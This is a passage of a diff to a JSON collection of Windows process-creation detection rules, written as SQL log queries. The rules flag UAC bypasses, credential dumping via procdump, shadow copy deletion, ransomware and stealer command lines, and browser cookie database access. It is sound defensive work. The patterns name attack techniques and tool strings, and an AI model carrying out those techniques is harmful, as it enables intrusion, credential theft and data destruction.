'%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_process.yml" + "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - Process", - "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Renamed Vmnat.exe Execution", + "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "status": "experimental", + "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", + "author": "elhoim", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'vmnat.exe' AND NOT ((NewProcessName LIKE '%vmnat.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" + "filename": "proc_creation_win_renamed_vmnat.yml" }, { - "title": "Shadow Copies Creation Using Operating Systems Utilities", - "id": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", - "status": "test", - "description": "Shadow Copies creation using operating systems utilities, possible credential access", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Add Scheduled Task Parent", + "id": "9494479d-d994-40bf-a8b1-eea890237021", + "status": "experimental", + "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.002", - "attack.t1003.003" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%unattended.ini%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_shadow_copies_creation.yml" + "filename": "proc_creation_win_schtasks_parent.yml" }, { - "title": "Suspicious Binary In User Directory Spawned From Office Application", - "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", - "status": "experimental", - "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", - "author": "Jason Lynch", + "title": "Suspicious RazerInstaller Explorer Subprocess", + "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "status": "test", + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.g0046", - "car.2013-05-002" + "attack.privilege_escalation", + "attack.t1553" ], "falsepositives": [ - "Unknown" + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" + "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" }, { - "title": "Execution via CL_Invocation.ps1", - "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", + "title": "Potential Commandline Obfuscation Using Unicode Characters", + "id": "e0552b19-5a83-4222-b141-b36184bb8d79", "status": "test", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_cl_invocation.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Update Activity", - "id": "e7581747-1e44-4d4b-85a6-0db0b4a00f2a", + "title": "Suspicious WebDav Client Execution", + "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", "status": "experimental", - "description": "Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.exfiltration", + "attack.t1048.003", + "cve.2023.23397" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\3CXDesktopApp\\\\app\\\\update.exe' ESCAPE '\\' AND CommandLine LIKE '%--update%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%/electron/update/win32/18.12%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-s WebClient%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_update.yml" + "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" }, { - "title": "Potential Encoded PowerShell Patterns In CommandLine", - "id": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", - "status": "test", - "description": "Detects specific combinations of encoding methods in PowerShell via the commandline", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "title": "New Generic Credentials Added Via Cmdkey.EXE", + "id": "b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", + "status": "experimental", + "description": "Detects usage of cmdkey to add generic credentials. As an example, this has to be used before connecting to an RDP session via command line interface.", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate usage for administration purposes" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (((CommandLine LIKE '%ToInt%' ESCAPE '\\' OR CommandLine LIKE '%ToDecimal%' ESCAPE '\\' OR CommandLine LIKE '%ToByte%' ESCAPE '\\' OR CommandLine LIKE '%ToUint%' ESCAPE '\\' OR CommandLine LIKE '%ToSingle%' ESCAPE '\\' OR CommandLine LIKE '%ToSByte%' ESCAPE '\\') AND (CommandLine LIKE '%ToChar%' ESCAPE '\\' OR CommandLine LIKE '%ToString%' ESCAPE '\\' OR CommandLine LIKE '%String%' ESCAPE '\\')) OR ((CommandLine LIKE '%char%' ESCAPE '\\' AND CommandLine LIKE '%join%' ESCAPE '\\') OR (CommandLine LIKE '%split%' ESCAPE '\\' AND CommandLine LIKE '%join%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /g%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_encoding_patterns.yml" + "filename": "proc_creation_win_cmdkey_adding_generic_creds.yml" }, { - "title": "Bypass UAC via WSReset.exe", - "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", - "status": "test", - "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "title": "PUA - NirCmd Execution", + "id": "4e2ed651-1906-4a59-a78a-18220fca1b22", + "status": "experimental", + "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown sub processes of Wsreset.exe" + "Legitimate use by administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NirCmd.exe' ESCAPE '\\' OR OriginalFileName = 'NirCmd.exe' OR (CommandLine LIKE '% execmd %' ESCAPE '\\' OR CommandLine LIKE '%.exe script %' ESCAPE '\\' OR CommandLine LIKE '%.exe shexec %' ESCAPE '\\' OR CommandLine LIKE '% runinteractive %' ESCAPE '\\')) OR ((CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% exec2 %' ESCAPE '\\') AND (CommandLine LIKE '% show %' ESCAPE '\\' OR CommandLine LIKE '% hide %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_wsreset.yml" + "filename": "proc_creation_win_pua_nircmd.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", - "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", + "title": "Rhadamanthys Stealer Module Launch Via Rundll32.EXE", + "id": "5cdbc2e8-86dd-43df-9a1a-200d4745fba5", "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "description": "Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023", + "author": "TropChaud", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'RUNDLL32.EXE' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\') AND CommandLine LIKE '%nsis\\_uns%' ESCAPE '\\' AND CommandLine LIKE '%PrintUIEntry%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" + "filename": "proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml" }, { - "title": "Potential Procdump Evasion", - "id": "79b06761-465f-4f88-9ef2-150e24d3d737", - "status": "test", - "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", - "author": "Florian Roth (Nextron Systems)", + "title": "SQLite Firefox Profile Data DB Access", + "id": "4833155a-4053-4c9c-a997-777fcea0baa7", + "status": "experimental", + "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.credential_access", + "attack.t1539", + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Cases in which procdump just gets copied to a different directory without any renaming" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" + "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher", - "id": "27aec9c9-dbb0-4939-8422-1742242471d0", - "status": "test", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Suspicious File Download via CertOC.exe", + "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "status": "experimental", + "description": "Detects when a user downloads file by using CertOC.exe", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_lolbin_certoc_download.yml" }, { - "title": "Rundll32 UNC Path Execution", - "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", - "status": "experimental", - "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1021.002", - "attack.t1218.011" - ], + "title": "Potential BlackByte Ransomware Activity", + "id": "999e8307-a775-4d5f-addc-4855632335be", + "status": "test", + "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_unc_path.yml" + "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" }, { - "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", - "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "title": "Potential SystemNightmare Exploitation Attempt", + "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", "status": "test", - "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", + "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1070.001" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Legitimate deactivation by administrative staff", - "Installer tools that disable services, e.g. before log collection agent installation" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_logman_disable_eventlog.yml" + "filename": "proc_creation_win_exploit_other_systemnightmare.yml" }, { - "title": "Suspicious Mshta.EXE Execution Patterns", - "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", - "status": "experimental", - "description": "Detects suspicious mshta process execution patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using MSConfig Token Modification - Process", + "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_susp_pattern.yml" + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Lolbin Unregmp2.exe Use As Proxy", - "id": "727454c0-d851-48b0-8b89-385611ab0704", - "status": "experimental", - "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", - "author": "frack113", + "title": "Potential Persistence Via Netsh Helper DLL", + "id": "56321594-9087-49d9-bf10-524fe8479452", + "status": "test", + "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.007", + "attack.s0108" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\unregmp2.exe' ESCAPE '\\' OR OriginalFileName = 'unregmp2.exe') AND CommandLine LIKE '% /HideWMP%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_unregmp2.yml" + "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" }, { - "title": "Renamed ProcDump Execution", - "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "title": "Suspicious RASdial Activity", + "id": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", "status": "test", - "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious process related to rasdial.exe", + "author": "juju4", "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Procdump illegaly bundled with legitimate software", - "Administrators who rename binaries (should be investigated)" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" + 